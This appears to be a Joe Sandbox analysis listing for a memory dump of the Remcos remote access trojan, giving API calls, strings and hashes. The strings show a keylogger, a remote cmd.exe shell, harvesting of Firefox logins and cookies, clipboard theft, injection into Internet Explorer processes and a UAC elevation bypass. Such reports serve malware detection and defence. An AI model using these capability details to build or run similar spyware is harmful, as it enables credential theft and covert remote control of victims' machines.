                                                                  • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                  • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                  • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID:
                                                                  • API String ID: 2809346765-0
                                                                  • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                  • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                                                  • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                                  • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: recv
                                                                  • String ID:
                                                                  • API String ID: 1507349165-0
                                                                  • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                  • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                                                  • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                                  • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                                                  APIs
                                                                  • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                    • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                    • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                    • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                  • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                    • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                    • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                    • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                    • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                  • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                  • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                                                    • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                  • API String ID: 1067849700-181434739
                                                                  • Opcode ID: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                                                                  • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                  • Opcode Fuzzy Hash: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                                                                  • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                  • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                  • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                  • API String ID: 2994406822-18413064
                                                                  • Opcode ID: 4cf14b19ad4f1a50ef4e69f7ada5f02e3acfdea048b49c70ac55160503c0ddf4
                                                                  • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                  • Opcode Fuzzy Hash: 4cf14b19ad4f1a50ef4e69f7ada5f02e3acfdea048b49c70ac55160503c0ddf4
                                                                  • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                    • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                    • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                  • OpenMutexA.KERNEL32 ref: 00412146
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                  • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                  • API String ID: 3018269243-13974260
                                                                  • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                                                  • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                  • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                                                  • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                  • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                  • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$CloseFile$FirstNext
                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                  • API String ID: 1164774033-3681987949
                                                                  • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                                                  • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                  • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                                                  • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                  APIs
                                                                  • OpenClipboard.USER32 ref: 004168C2
                                                                  • EmptyClipboard.USER32 ref: 004168D0
                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                  • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                  • CloseClipboard.USER32 ref: 00416955
                                                                  • OpenClipboard.USER32 ref: 0041695C
                                                                  • GetClipboardData.USER32 ref: 0041696C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                  • CloseClipboard.USER32 ref: 00416984
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                  • String ID: !D@
                                                                  • API String ID: 3520204547-604454484
                                                                  • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                                                  • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                  • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                                                  • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                  • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                  • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                  • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$Close$File$FirstNext
                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                  • API String ID: 3527384056-432212279
                                                                  • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                                                  • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                  • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                                                  • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                  • API String ID: 3756808967-1743721670
                                                                  • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                                                  • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                  • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                                                  • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                                  • API String ID: 0-1861860590
                                                                  • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                                                  • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                  • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                                                  • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00407521
                                                                  • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Object_wcslen
                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                  • API String ID: 240030777-3166923314
                                                                  • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                  • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                  • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                  • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                  • GetLastError.KERNEL32 ref: 0041A7BB
                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                  • String ID:
                                                                  • API String ID: 3587775597-0
                                                                  • Opcode ID: 79deda2eaf5389e9881e5cc6274fd0cbf241d84606103934df9ee54e93fb00d6
                                                                  • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                  • Opcode Fuzzy Hash: 79deda2eaf5389e9881e5cc6274fd0cbf241d84606103934df9ee54e93fb00d6
                                                                  • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                  • String ID: lJD$lJD$lJD
                                                                  • API String ID: 745075371-479184356
                                                                  • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                  • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                  • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                  • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                  • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$CloseFile$FirstNext
                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                  • API String ID: 1164774033-405221262
                                                                  • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                                                  • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                  • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                                                  • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                  • String ID:
                                                                  • API String ID: 2341273852-0
                                                                  • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                  • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                  • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                  • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Find$CreateFirstNext
                                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                                  • API String ID: 341183262-3812160132
                                                                  • Opcode ID: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                                                                  • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                  • Opcode Fuzzy Hash: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                                                                  • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                  • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                  • GetLastError.KERNEL32 ref: 0040A2ED
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  • GetMessageA.USER32 ref: 0040A33B
                                                                  • TranslateMessage.USER32(?), ref: 0040A34A
                                                                  • DispatchMessageA.USER32(?), ref: 0040A355
                                                                  Strings
                                                                  • Keylogger initialization failure: error , xrefs: 0040A301
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                  • String ID: Keylogger initialization failure: error
                                                                  • API String ID: 3219506041-952744263
                                                                  • Opcode ID: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                                                                  • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                  • Opcode Fuzzy Hash: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                                                                  • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                  • String ID:
                                                                  • API String ID: 1888522110-0
                                                                  • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                  • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
